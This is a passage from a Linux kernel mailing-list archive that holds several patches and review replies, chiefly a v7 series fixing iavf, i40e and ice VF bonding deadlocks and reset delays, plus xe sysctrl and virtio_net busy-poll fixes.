+	return xe_ras_set_threshold(xe, DRM_XE_RAS_ERR_SEV_CORRECTABLE, error_id, threshold);
+}
+
 static struct xe_drm_ras_counter *allocate_and_copy_counters(struct xe_device *xe)
 {
 	struct xe_drm_ras_counter *counter;
@@ -134,6 +166,8 @@ static int assign_node_params(struct xe_device *xe, struct drm_ras_node *node,
 	if (severity == DRM_XE_RAS_ERR_SEV_CORRECTABLE) {
 		node->query_error_counter = query_correctable_error_counter;
 		node->clear_error_counter = clear_correctable_error_counter;
+		node->query_error_threshold = query_correctable_error_threshold;
+		node->set_error_threshold = set_correctable_error_threshold;
 	} else {
 		node->query_error_counter = query_uncorrectable_error_counter;
 		node->clear_error_counter = clear_uncorrectable_error_counter;
-- 
2.43.0


^ permalink raw reply related

* [PATCH v4 5/5] drm/xe/sysctrl: Reuse xe_sysctrl_create_command()
From: Raag Jadav @ 2026-06-23 10:09 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: simona.vetter, airlied, kuba, lijo.lazar, Hawking.Zhang, davem,
	pabeni, edumazet, dev, zachary.mckevitt, rodrigo.vivi,
	riana.tauro, michal.wajdeczko, matthew.d.roper, mallesh.koujalagi,
	Raag Jadav
In-Reply-To: <20260623101043.255897-1-raag.jadav@intel.com>

Now that we have a helper to create sysctrl command, reuse it for
threshold crossed events.

Signed-off-by: Raag Jadav <raag.jadav@intel.com>
---
 drivers/gpu/drm/xe/xe_sysctrl_event.c | 28 ++++++++-------------------
 1 file changed, 8 insertions(+), 20 deletions(-)

diff --git a/drivers/gpu/drm/xe/xe_sysctrl_event.c b/drivers/gpu/drm/xe/xe_sysctrl_event.c
index b4d17329af6c..0547b7b39726 100644
--- a/drivers/gpu/drm/xe/xe_sysctrl_event.c
+++ b/drivers/gpu/drm/xe/xe_sysctrl_event.c
@@ -49,18 +49,6 @@ static void get_pending_event(struct xe_sysctrl *sc, struct xe_sysctrl_mailbox_c
 	} while (response->count);
 }
 
-static void event_request_prepare(struct xe_device *xe, struct xe_sysctrl_app_msg_hdr *header,
-				  struct xe_sysctrl_event_request *request)
-{
-	struct pci_dev *pdev = to_pci_dev(xe->drm.dev);
-
-	header->data = REG_FIELD_PREP(APP_HDR_GROUP_ID_MASK, XE_SYSCTRL_GROUP_GFSP) |
-		       REG_FIELD_PREP(APP_HDR_COMMAND_MASK, XE_SYSCTRL_CMD_GET_PENDING_EVENT);
-
-	request->vector = xe_device_has_msix(xe) ? XE_IRQ_DEFAULT_MSIX : 0;
-	request->fn = PCI_FUNC(pdev->devfn);
-}
-
 /**
  * xe_sysctrl_event() - Handler for System Controller events
  * @sc: System Controller instance
@@ -72,16 +60,16 @@ void xe_sysctrl_event(struct xe_sysctrl *sc)
 	struct xe_sysctrl_mailbox_command command = {};
 	struct xe_sysctrl_event_response response = {};
 	struct xe_sysctrl_event_request request = {};
-	struct xe_sysctrl_app_msg_hdr header = {};
+	struct xe_device *xe = sc_to_xe(sc);
+	struct pci_dev *pdev = to_pci_dev(xe->drm.dev);
 
-	xe_device_assert_mem_access(sc_to_xe(sc));
-	event_request_prepare(sc_to_xe(sc), &header, &request);
+	xe_device_assert_mem_access(xe);
 
-	command.header = header;
-	command.data_in = &request;
-	command.data_in_len = sizeof(request);
-	command.data_out = &response;
-	command.data_out_len = sizeof(response);
+	request.vector = xe_device_has_msix(xe) ? XE_IRQ_DEFAULT_MSIX : 0;
+	request.fn = PCI_FUNC(pdev->devfn);
+
+	xe_sysctrl_create_command(&command, XE_SYSCTRL_GROUP_GFSP, XE_SYSCTRL_CMD_GET_PENDING_EVENT,
+				  &request, sizeof(request), &response, sizeof(response));
 
 	guard(mutex)(&sc->event_lock);
 	get_pending_event(sc, &command);
-- 
2.43.0


^ permalink raw reply related

* Re: [PATCH v2] virtio_net: disable cb when NAPI is busy-polled
From: Michael S. Tsirkin @ 2026-06-23 10:15 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Longjun Tang, netdev, xuanzhuo, jasowang, virtualization,
	tanglongjun
In-Reply-To: <CANn89iLrOTKQNqJA_oZKPjkHb1Xyqm6LS9tDn72X4az65isDGQ@mail.gmail.com>

On Tue, Jun 23, 2026 at 02:55:30AM -0700, Eric Dumazet wrote:
> On Tue, Jun 23, 2026 at 2:19 AM Longjun Tang <lange_tang@163.com> wrote:
> >
> > From: Longjun Tang <tanglongjun@kylinos.cn>
> >
> > When busy-poll is active, napi_schedule_prep() returns false in
> > virtqueue_napi_schedule(), so virtqueue_disable_cb() is skipped.
> > The device may keep firing irqs until reaches virtqueue_napi_complete().
> > Under load (received == budget), it will lead to a large number
> > of spurious interrupts.
> >
> > Fix it by disabling the callback at the virtnet_poll() entry. This keeps
> > the callback off while we poll and re-enable by virtqueue_napi_complete()
> > when going idle.
> >
> > Signed-off-by: Longjun Tang <tanglongjun@kylinos.cn>
> >
> 
> I added netdev@ to get more attention from networking napi polling experts,
> 
> Please add a Fixes: tag as this will ease code review.
> 
> My rough guess is:
> 
> Fixes: ceef438d613f ("virtio_net: remove custom busy_poll")
> 
> Thanks.

Exactly. The old custom virtnet_busy_poll did napi_schedule_prep + virtqueue_disable_cb itself.

I'd even say CC stable interrupt storms are devastating to performance.


> > ---
> > V1 -> V2: Remain agnostic to busy polling
> > ---
> >  drivers/net/virtio_net.c | 5 +++++
> >  1 file changed, 5 insertions(+)
> >
> > diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
> > index f4adcfee7a80..0a11f2b32500 100644
> > --- a/drivers/net/virtio_net.c
> > +++ b/drivers/net/virtio_net.c
> > @@ -3008,6 +3008,11 @@ static int virtnet_poll(struct napi_struct *napi, int budget)
> >         unsigned int xdp_xmit = 0;
> >         bool napi_complete;
> >
> > +       /* Keep callbacks suppressed for the duration of this poll,
> > +        * busy-poll need.
> > +        */
> > +       virtqueue_disable_cb(rq->vq);
> > +
> >         virtnet_poll_cleantx(rq, budget);
> >
> >         received = virtnet_receive(rq, budget, &xdp_xmit);
> > --
> > 2.43.0
> >


^ permalink raw reply

* [PATCH net v7 0/4] Fix i40e/ice/iavf VF bonding after netdev lock changes
From: Jose Ignacio Tornos Martinez @ 2026-06-23 10:17 UTC (permalink / raw)
  To: netdev
  Cc: intel-wired-lan, przemyslaw.kitszel, aleksandr.loktionov,
	jacob.e.keller, horms, anthony.l.nguyen, davem, edumazet, kuba,
	pabeni, Jose Ignacio Tornos Martinez

This series fixes VF bonding failures introduced by commit ad7c7b2172c3
("net: hold netdev instance lock during sysfs operations").

When adding VFs to a bond immediately after setting trust mode, MAC
address changes fail with -EAGAIN, preventing bonding setup. This
affects both i40e (700-series) and ice (800-series) Intel NICs.

The core issue is lock contention: iavf_set_mac() is now called with the
netdev lock held and waits for MAC change completion while holding it.
However, both the watchdog task that sends the request and the adminq_task
that processes PF responses also need this lock, creating a deadlock where
neither can run, causing timeouts.

Additionally, setting VF trust triggers an unnecessary ~10 second VF reset
in i40e driver that delays bonding setup, even though filter
synchronization happens naturally during normal VF operation. For ice
driver, the delay is not so big, but in the same way the operation is not
necessary.

This series:
1. Adds safety guard to prevent MAC changes during reset or early
   initialization (before VF is ready)
2. Eliminates unnecessary VF reset when setting trust in i40e (reset only
   if revoking trust and VF has advanced features configured).
3. Fixes lock contention by polling admin queue synchronously
4. Eliminates unnecessary VF reset when setting trust in ice, (reset only
   if revoking trust and VF has advanced features configured).

The key fix (patch 3/4) implements a synchronous MAC change operation
similar to the approach used for ndo_change_mtu deadlock fix:
https://lore.kernel.org/intel-wired-lan/20260211191855.1532226-1-poros@redhat.com/
Instead of scheduling work and waiting, it:

- Sends the virtchnl message directly (not via watchdog)
- Polls the admin queue hardware directly for responses
- Processes all messages inline (including non-MAC messages)
- Returns when complete or times out

This allows the operation to complete synchronously while holding
netdev_lock, without relying on watchdog or adminq_task.

The function can sleep for up to 2.5 seconds polling hardware, but this
is acceptable since netdev_lock is per-device and only serializes
operations on the same interface.

Testing shows VF bonding now works reliably in ~5 seconds vs 15+ seconds
before (i40e), without timeouts or errors (i40e and ice).

Tested on Intel 700-series (i40e) and 800-series (ice) dual-port NICs
with iavf driver.

Thanks to Jan Tluka <jtluka@redhat.com> and Yuying Ma <yuma@redhat.com> for
reporting the issues.

Jose Ignacio Tornos Martinez (4):
  iavf: return EBUSY if reset in progress or not ready during MAC change
  i40e: skip unnecessary VF reset when setting trust
  iavf: send MAC change request synchronously
  ice: skip unnecessary VF reset when setting trust

All patches tested successfully with bonding setup.
---
v7:
  - Patches 1/4, 2/4 and 4/4: No changes from v6
  - Patch 3/4:
    Rebase on current net tree
    Remove the multi-batch processing loop from version 6 according to Przemek
    Kitszel review: the loop cannot work without polling between iterations
    since the second call would fail the current_op check. Multi-batch scenario
    is extremely rare; send first batch and let watchdog handle remainder as v5
    did
v6: https://lore.kernel.org/all/20260619061321.8554-1-jtornosm@redhat.com/

--
2.43.0

^ permalink raw reply

* [PATCH net v7 1/4] iavf: return EBUSY if reset in progress or not ready during MAC change
From: Jose Ignacio Tornos Martinez @ 2026-06-23 10:17 UTC (permalink / raw)
  To: netdev
  Cc: intel-wired-lan, przemyslaw.kitszel, aleksandr.loktionov,
	jacob.e.keller, horms, anthony.l.nguyen, davem, edumazet, kuba,
	pabeni, Jose Ignacio Tornos Martinez, Rafal Romanowski
In-Reply-To: <20260623101800.991293-1-jtornosm@redhat.com>

When a MAC address change is requested while the VF is resetting or still
initializing, return -EBUSY immediately instead of attempting the
operation.

Additionally, during early initialization states (before __IAVF_DOWN),
the PF may be slow to respond to MAC change requests, causing long
delays. Only allow MAC changes once the VF reaches __IAVF_DOWN state or
later, when the watchdog is running and the VF is ready for operations.

After commit ad7c7b2172c3 ("net: hold netdev instance lock
during sysfs operations"), MAC changes are called with the netdev lock
held, so we should not wait with the lock held during reset or
initialization. This allows the caller to retry or handle the busy state
appropriately without blocking other operations.

Signed-off-by: Jose Ignacio Tornos Martinez <jtornosm@redhat.com>
Reviewed-by: Przemek Kitszel <przemyslaw.kitszel@intel.com>
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
Tested-by: Rafal Romanowski <rafal.romanowski@intel.com>
---
v7: Rebase on current net tree (no code changes from v6)
v6: https://lore.kernel.org/all/20260619061321.8554-2-jtornosm@redhat.com/

 drivers/net/ethernet/intel/iavf/iavf_main.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
index dad001abc908..67aa14350b1b 100644
--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
+++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
@@ -1060,6 +1060,9 @@ static int iavf_set_mac(struct net_device *netdev, void *p)
 	struct sockaddr *addr = p;
 	int ret;

+	if (iavf_is_reset_in_progress(adapter) || adapter->state < __IAVF_DOWN)
+		return -EBUSY;
+
 	if (!is_valid_ether_addr(addr->sa_data))
 		return -EADDRNOTAVAIL;

-- 
2.53.0

^ permalink raw reply related

* [PATCH net v7 2/4] i40e: skip unnecessary VF reset when setting trust
From: Jose Ignacio Tornos Martinez @ 2026-06-23 10:17 UTC (permalink / raw)
  To: netdev
  Cc: intel-wired-lan, przemyslaw.kitszel, aleksandr.loktionov,
	jacob.e.keller, horms, anthony.l.nguyen, davem, edumazet, kuba,
	pabeni, Jose Ignacio Tornos Martinez, Rafal Romanowski
In-Reply-To: <20260623101800.991293-1-jtornosm@redhat.com>

The current implementation triggers a VF reset when changing the trust
setting, causing a ~10 second delay during bonding setup.

In all the cases, the reset causes a ~10 second delay during which:
- VF must reinitialize completely
- Any in-progress operations (like bonding enslave) fail with timeouts
- VF is unavailable

When granting trust, no reset is needed - we can just set the capability
flag to allow privileged operations.

When revoking trust, we only need to reset (conservative approach) if
the VF has actually configured advanced features that require cleanup
(ADQ/cloud filters, promiscuous mode). For VFs in a clean state, we can
safely change the trust setting without the disruptive reset.

When we don't reset, we manually handle capability flag via helper
function, eliminating the delay.

Signed-off-by: Jose Ignacio Tornos Martinez <jtornosm@redhat.com>
Tested-by: Rafal Romanowski <rafal.romanowski@intel.com>
---
v7: Rebase on current net tree (no code changes from v6)
v6: https://lore.kernel.org/all/20260619061321.8554-3-jtornosm@redhat.com/

 .../ethernet/intel/i40e/i40e_virtchnl_pf.c    | 38 ++++++++++++++-----
 1 file changed, 28 insertions(+), 10 deletions(-)

diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
index a26c3d47ec15..0cc434b26eb8 100644
--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
@@ -4943,6 +4943,23 @@ int i40e_ndo_set_vf_spoofchk(struct net_device *netdev, int vf_id, bool enable)
 	return ret;
 }
 
+/**
+ * i40e_setup_vf_trust - Enable/disable VF trust mode without reset
+ * @vf: VF to configure
+ * @setting: trust setting
+ *
+ * Update VF flags when changing trust without performing a VF reset.
+ * This is only called when it's safe to skip the reset (VF has no advanced
+ * features configured that need cleanup).
+ */
+static void i40e_setup_vf_trust(struct i40e_vf *vf, bool setting)
+{
+	if (setting)
+		set_bit(I40E_VIRTCHNL_VF_CAP_PRIVILEGE, &vf->vf_caps);
+	else
+		clear_bit(I40E_VIRTCHNL_VF_CAP_PRIVILEGE, &vf->vf_caps);
+}
+
 /**
  * i40e_ndo_set_vf_trust
  * @netdev: network interface device structure of the pf
@@ -4987,19 +5004,20 @@ int i40e_ndo_set_vf_trust(struct net_device *netdev, int vf_id, bool setting)
 	set_bit(__I40E_MACVLAN_SYNC_PENDING, pf->state);
 	pf->vsi[vf->lan_vsi_idx]->flags |= I40E_VSI_FLAG_FILTER_CHANGED;
 
-	i40e_vc_reset_vf(vf, true);
+	/* Reset only if revoking trust and VF has advanced features configured */
+	if (!setting &&
+	    (vf->adq_enabled || vf->num_cloud_filters > 0 ||
+	     test_bit(I40E_VF_STATE_UC_PROMISC, &vf->vf_states) ||
+	     test_bit(I40E_VF_STATE_MC_PROMISC, &vf->vf_states))) {
+		i40e_vc_reset_vf(vf, true);
+		i40e_del_all_cloud_filters(vf);
+	} else {
+		i40e_setup_vf_trust(vf, setting);
+	}
+
 	dev_info(&pf->pdev->dev, "VF %u is now %strusted\n",
 		 vf_id, setting ? "" : "un");
 
-	if (vf->adq_enabled) {
-		if (!vf->trusted) {
-			dev_info(&pf->pdev->dev,
-				 "VF %u no longer Trusted, deleting all cloud filters\n",
-				 vf_id);
-			i40e_del_all_cloud_filters(vf);
-		}
-	}
-
 out:
 	clear_bit(__I40E_VIRTCHNL_OP_PENDING, pf->state);
 	return ret;
-- 
2.53.0


^ permalink raw reply related

* [PATCH net v7 3/4] iavf: send MAC change request synchronously
From: Jose Ignacio Tornos Martinez @ 2026-06-23 10:17 UTC (permalink / raw)
  To: netdev
  Cc: intel-wired-lan, przemyslaw.kitszel, aleksandr.loktionov,
	jacob.e.keller, horms, anthony.l.nguyen, davem, edumazet, kuba,
	pabeni, Jose Ignacio Tornos Martinez, stable
In-Reply-To: <20260623101800.991293-1-jtornosm@redhat.com>

After commit ad7c7b2172c3 ("net: hold netdev instance lock during sysfs
operations"), iavf_set_mac() is called with the netdev instance lock
already held.

The function queues a MAC address change request via
iavf_replace_primary_mac() and then waits for completion. However, in
the current flow, the actual virtchnl message is sent by the watchdog
task, which also needs to acquire the netdev lock to run. Additionally,
the adminq_task which processes virtchnl responses also needs the netdev
lock.

This creates a deadlock scenario:
1. iavf_set_mac() holds netdev lock and waits for MAC change
2. Watchdog needs netdev lock to send the request -> blocked
3. Even if request is sent, adminq_task needs netdev lock to process
   PF response -> blocked
4. MAC change times out after 2.5 seconds
5. iavf_set_mac() returns -EAGAIN

This particularly affects VFs during bonding setup when multiple VFs are
enslaved in quick succession.

Fix by implementing a synchronous MAC change operation similar to the
approach used in commit fdadbf6e84c4 ("iavf: fix incorrect reset handling
in callbacks").

The solution:
1. Send the virtchnl ADD_ETH_ADDR message directly (not via watchdog)
2. Poll the admin queue hardware directly for responses
3. Process all received messages (including non-MAC messages)
4. Return when MAC change completes or times out

A new generic function iavf_poll_virtchnl_response() is introduced that
can be reused for any future synchronous virtchnl operations. It takes a
callback to check completion, allowing flexible condition checking.

This allows the operation to complete synchronously while holding
netdev_lock, without relying on watchdog or adminq_task. The function
can sleep for up to 2.5 seconds polling hardware, but this is acceptable
since netdev_lock is per-device and only serializes operations on the
same interface.

To support this, change iavf_add_ether_addrs() to return an error code
instead of void, allowing callers to detect failures. Additionally,
export iavf_mac_add_reject() to enable proper rollback on local failures
(timeouts, send errors) - PF rejections are already handled automatically
by iavf_virtchnl_completion().

Remove vc_waitqueue entirely because iavf_set_mac was the only waiter on
this waitqueue and after the changes it is not needed.

Fixes: ad7c7b2172c3 ("net: hold netdev instance lock during sysfs operations")
cc: stable@vger.kernel.org
Signed-off-by: Jose Ignacio Tornos Martinez <jtornosm@redhat.com>
---
v7: Rebase on current net tree
    Remove the multi-batch processing loop from version 6 according to Przemek
    Kitszel review: the loop cannot work without polling between iterations
    since the second call would fail the current_op check. Multi-batch scenario
    is extremely rare; send first batch and let watchdog handle remainder as v5
    did
v6: https://lore.kernel.org/all/20260619061321.8554-4-jtornosm@redhat.com/

 drivers/net/ethernet/intel/iavf/iavf.h        | 11 ++-
 drivers/net/ethernet/intel/iavf/iavf_main.c   | 85 ++++++++++++----
 .../net/ethernet/intel/iavf/iavf_virtchnl.c   | 99 +++++++++++++++++--
 3 files changed, 165 insertions(+), 30 deletions(-)

diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
index 050f8241ef5e..5fcbfa0ca855 100644
--- a/drivers/net/ethernet/intel/iavf/iavf.h
+++ b/drivers/net/ethernet/intel/iavf/iavf.h
@@ -259,7 +259,6 @@ struct iavf_adapter {
 	struct work_struct adminq_task;
 	struct work_struct finish_config;
 	wait_queue_head_t down_waitqueue;
-	wait_queue_head_t vc_waitqueue;
 	struct iavf_q_vector *q_vectors;
 	struct list_head vlan_filter_list;
 	int num_vlan_filters;
@@ -588,8 +587,9 @@ void iavf_configure_queues(struct iavf_adapter *adapter);
 void iavf_enable_queues(struct iavf_adapter *adapter);
 void iavf_disable_queues(struct iavf_adapter *adapter);
 void iavf_map_queues(struct iavf_adapter *adapter);
-void iavf_add_ether_addrs(struct iavf_adapter *adapter);
+int iavf_add_ether_addrs(struct iavf_adapter *adapter);
 void iavf_del_ether_addrs(struct iavf_adapter *adapter);
+void iavf_mac_add_reject(struct iavf_adapter *adapter);
 void iavf_add_vlans(struct iavf_adapter *adapter);
 void iavf_del_vlans(struct iavf_adapter *adapter);
 void iavf_set_promiscuous(struct iavf_adapter *adapter);
@@ -606,6 +606,13 @@ void iavf_disable_vlan_stripping(struct iavf_adapter *adapter);
 void iavf_virtchnl_completion(struct iavf_adapter *adapter,
 			      enum virtchnl_ops v_opcode,
 			      enum iavf_status v_retval, u8 *msg, u16 msglen);
+int iavf_poll_virtchnl_response(struct iavf_adapter *adapter,
+				struct iavf_arq_event_info *event,
+				bool (*condition)(struct iavf_adapter *adapter,
+						  const void *data,
+						  enum virtchnl_ops v_op),
+				const void *cond_data,
+				unsigned int timeout_ms);
 int iavf_config_rss(struct iavf_adapter *adapter);
 void iavf_cfg_queues_bw(struct iavf_adapter *adapter);
 void iavf_cfg_queues_quanta_size(struct iavf_adapter *adapter);
diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
index 630388e9d28c..3fa288e3798a 100644
--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
+++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
@@ -1029,6 +1029,60 @@ static bool iavf_is_mac_set_handled(struct net_device *netdev,
 	return ret;
 }
 
+/**
+ * iavf_mac_change_done - Check if MAC change completed
+ * @adapter: board private structure
+ * @data: MAC address being checked (as const void *)
+ * @v_op: virtchnl opcode from processed message
+ *
+ * Callback for iavf_poll_virtchnl_response() to check if MAC change completed.
+ *
+ * Return: true if MAC change completed, false otherwise
+ */
+static bool iavf_mac_change_done(struct iavf_adapter *adapter,
+				 const void *data, enum virtchnl_ops v_op)
+{
+	const u8 *addr = data;
+
+	return iavf_is_mac_set_handled(adapter->netdev, addr);
+}
+
+/**
+ * iavf_set_mac_sync - Synchronously change MAC address
+ * @adapter: board private structure
+ * @addr: MAC address to set
+ *
+ * Send MAC change request to PF and poll admin queue for response.
+ * Caller must hold netdev_lock. This can sleep for up to 2.5 seconds.
+ * Event buffer is allocated before sending to avoid state mismatch if
+ * allocation fails after message is sent to PF.
+ *
+ * Return: 0 on success, negative on failure
+ */
+static int iavf_set_mac_sync(struct iavf_adapter *adapter, const u8 *addr)
+{
+	struct iavf_arq_event_info event;
+	int ret;
+
+	netdev_assert_locked(adapter->netdev);
+
+	event.buf_len = IAVF_MAX_AQ_BUF_SIZE;
+	event.msg_buf = kzalloc(event.buf_len, GFP_KERNEL);
+	if (!event.msg_buf)
+		return -ENOMEM;
+
+	ret = iavf_add_ether_addrs(adapter);
+	if (ret)
+		goto out;
+
+	ret = iavf_poll_virtchnl_response(adapter, &event,
+					  iavf_mac_change_done, addr, 2500);
+
+out:
+	kfree(event.msg_buf);
+	return ret;
+}
+
 /**
  * iavf_set_mac - NDO callback to set port MAC address
  * @netdev: network interface device structure
@@ -1049,25 +1103,23 @@ static int iavf_set_mac(struct net_device *netdev, void *p)
 		return -EADDRNOTAVAIL;
 
 	ret = iavf_replace_primary_mac(adapter, addr->sa_data);
-
 	if (ret)
 		return ret;
 
-	ret = wait_event_interruptible_timeout(adapter->vc_waitqueue,
-					       iavf_is_mac_set_handled(netdev, addr->sa_data),
-					       msecs_to_jiffies(2500));
-
-	/* If ret < 0 then it means wait was interrupted.
-	 * If ret == 0 then it means we got a timeout.
-	 * else it means we got response for set MAC from PF,
-	 * check if netdev MAC was updated to requested MAC,
-	 * if yes then set MAC succeeded otherwise it failed return -EACCES
-	 */
-	if (ret < 0)
+	ret = iavf_set_mac_sync(adapter, addr->sa_data);
+	if (ret) {
+		/* Rollback only if send failed (message never reached PF).
+		 * Don't rollback on timeout (-EAGAIN) because the message was
+		 * sent and PF will eventually respond. When the response arrives,
+		 * iavf_virtchnl_completion() will handle rollback (on PF error)
+		 * or acceptance (on PF success) automatically.
+		 */
+		if (ret != -EAGAIN) {
+			iavf_mac_add_reject(adapter);
+			ether_addr_copy(adapter->hw.mac.addr, netdev->dev_addr);
+		}
 		return ret;
-
-	if (!ret)
-		return -EAGAIN;
+	}
 
 	if (!ether_addr_equal(netdev->dev_addr, addr->sa_data))
 		return -EACCES;
@@ -5397,9 +5449,6 @@ static int iavf_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
 	/* Setup the wait queue for indicating transition to down status */
 	init_waitqueue_head(&adapter->down_waitqueue);
 
-	/* Setup the wait queue for indicating virtchannel events */
-	init_waitqueue_head(&adapter->vc_waitqueue);
-
 	INIT_LIST_HEAD(&adapter->ptp.aq_cmds);
 	init_waitqueue_head(&adapter->ptp.phc_time_waitqueue);
 	mutex_init(&adapter->ptp.aq_cmd_lock);
diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
index ec234cc8bd9d..e6b7e8f82c7c 100644
--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
@@ -2,6 +2,7 @@
 /* Copyright(c) 2013 - 2018 Intel Corporation. */
 
 #include <linux/net/intel/libie/rx.h>
+#include <net/netdev_lock.h>
 
 #include "iavf.h"
 #include "iavf_ptp.h"
@@ -555,20 +556,23 @@ iavf_set_mac_addr_type(struct virtchnl_ether_addr *virtchnl_ether_addr,
  * @adapter: adapter structure
  *
  * Request that the PF add one or more addresses to our filters.
- **/
-void iavf_add_ether_addrs(struct iavf_adapter *adapter)
+ *
+ * Return: 0 on success, negative on failure
+ */
+int iavf_add_ether_addrs(struct iavf_adapter *adapter)
 {
 	struct virtchnl_ether_addr_list *veal;
 	struct iavf_mac_filter *f;
 	int i = 0, count = 0;
 	bool more = false;
 	size_t len;
+	int ret;
 
 	if (adapter->current_op != VIRTCHNL_OP_UNKNOWN) {
 		/* bail because we already have a command pending */
 		dev_err(&adapter->pdev->dev, "Cannot add filters, command %d pending\n",
 			adapter->current_op);
-		return;
+		return -EBUSY;
 	}
 
 	spin_lock_bh(&adapter->mac_vlan_list_lock);
@@ -580,7 +584,7 @@ void iavf_add_ether_addrs(struct iavf_adapter *adapter)
 	if (!count) {
 		adapter->aq_required &= ~IAVF_FLAG_AQ_ADD_MAC_FILTER;
 		spin_unlock_bh(&adapter->mac_vlan_list_lock);
-		return;
+		return 0;
 	}
 	adapter->current_op = VIRTCHNL_OP_ADD_ETH_ADDR;
 
@@ -594,8 +598,9 @@ void iavf_add_ether_addrs(struct iavf_adapter *adapter)
 
 	veal = kzalloc(len, GFP_ATOMIC);
 	if (!veal) {
+		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
 		spin_unlock_bh(&adapter->mac_vlan_list_lock);
-		return;
+		return -ENOMEM;
 	}
 
 	veal->vsi_id = adapter->vsi_res->vsi_id;
@@ -615,8 +620,15 @@ void iavf_add_ether_addrs(struct iavf_adapter *adapter)
 
 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
 
-	iavf_send_pf_msg(adapter, VIRTCHNL_OP_ADD_ETH_ADDR, (u8 *)veal, len);
+	ret = iavf_send_pf_msg(adapter, VIRTCHNL_OP_ADD_ETH_ADDR, (u8 *)veal, len);
 	kfree(veal);
+	if (ret) {
+		dev_err(&adapter->pdev->dev,
+			"Unable to send ADD_ETH_ADDR message to PF, error %d\n", ret);
+		adapter->current_op = VIRTCHNL_OP_UNKNOWN;
+	}
+
+	return ret;
 }
 
 /**
@@ -712,8 +724,8 @@ static void iavf_mac_add_ok(struct iavf_adapter *adapter)
  * @adapter: adapter structure
  *
  * Remove filters from list based on PF response.
- **/
-static void iavf_mac_add_reject(struct iavf_adapter *adapter)
+ */
+void iavf_mac_add_reject(struct iavf_adapter *adapter)
 {
 	struct net_device *netdev = adapter->netdev;
 	struct iavf_mac_filter *f, *ftmp;
@@ -2364,7 +2376,6 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
 			iavf_mac_add_reject(adapter);
 			/* restore administratively set MAC address */
 			ether_addr_copy(adapter->hw.mac.addr, netdev->dev_addr);
-			wake_up(&adapter->vc_waitqueue);
 			break;
 		case VIRTCHNL_OP_DEL_ETH_ADDR:
 			dev_err(&adapter->pdev->dev, "Failed to delete MAC filter, error %s\n",
@@ -2555,7 +2566,6 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
 			eth_hw_addr_set(netdev, adapter->hw.mac.addr);
 			netif_addr_unlock_bh(netdev);
 		}
-		wake_up(&adapter->vc_waitqueue);
 		break;
 	case VIRTCHNL_OP_GET_STATS: {
 		struct iavf_eth_stats *stats =
@@ -2950,3 +2960,72 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
 	} /* switch v_opcode */
 	adapter->current_op = VIRTCHNL_OP_UNKNOWN;
 }
+
+/**
+ * iavf_poll_virtchnl_response - Poll admin queue for virtchnl response
+ * @adapter: adapter structure
+ * @event: pre-allocated event buffer to use for polling
+ * @condition: callback to check if desired response received
+ * @cond_data: context data passed to condition callback
+ * @timeout_ms: maximum time to wait in milliseconds
+ *
+ * Polls the admin queue and processes all incoming virtchnl messages.
+ * After processing each valid message, calls the condition callback to check
+ * if the expected response has been received. The callback receives the opcode
+ * of the processed message to identify which response was received. Continues
+ * polling until the callback returns true or timeout expires.
+ *
+ * Caller must allocate event buffer before sending any messages to PF to avoid
+ * state mismatch if allocation fails after message is sent.
+ *
+ * Caller must hold netdev_lock. This can sleep for up to timeout_ms while
+ * polling hardware.
+ *
+ * Return: 0 on success (condition met), -EAGAIN on timeout, or error code
+ */
+int iavf_poll_virtchnl_response(struct iavf_adapter *adapter,
+				struct iavf_arq_event_info *event,
+				bool (*condition)(struct iavf_adapter *adapter,
+						  const void *data,
+						  enum virtchnl_ops v_op),
+				const void *cond_data,
+				unsigned int timeout_ms)
+{
+	struct iavf_hw *hw = &adapter->hw;
+	enum virtchnl_ops received_op;
+	unsigned long timeout;
+	int ret = -EAGAIN;
+	u16 pending = 0;
+	u32 v_retval;
+
+	netdev_assert_locked(adapter->netdev);
+
+	timeout = jiffies + msecs_to_jiffies(timeout_ms);
+	do {
+		if (!pending)
+			usleep_range(50, 75);
+
+		if (iavf_clean_arq_element(hw, event, &pending) == IAVF_SUCCESS) {
+			received_op = (enum virtchnl_ops)le32_to_cpu(event->desc.cookie_high);
+			if (received_op != VIRTCHNL_OP_UNKNOWN) {
+				v_retval = le32_to_cpu(event->desc.cookie_low);
+
+				iavf_virtchnl_completion(adapter, received_op,
+							 (enum iavf_status)v_retval,
+							 event->msg_buf, event->msg_len);
+
+				if (condition(adapter, cond_data, received_op)) {
+					ret = 0;
+					break;
+				}
+			}
+
+			memset(event->msg_buf, 0, IAVF_MAX_AQ_BUF_SIZE);
+
+			if (pending)
+				continue;
+		}
+	} while (time_before(jiffies, timeout));
+
+	return ret;
+}
-- 
2.54.0


^ permalink raw reply related

* [PATCH net v7 4/4] ice: skip unnecessary VF reset when setting trust
From: Jose Ignacio Tornos Martinez @ 2026-06-23 10:18 UTC (permalink / raw)
  To: netdev
  Cc: intel-wired-lan, przemyslaw.kitszel, aleksandr.loktionov,
	jacob.e.keller, horms, anthony.l.nguyen, davem, edumazet, kuba,
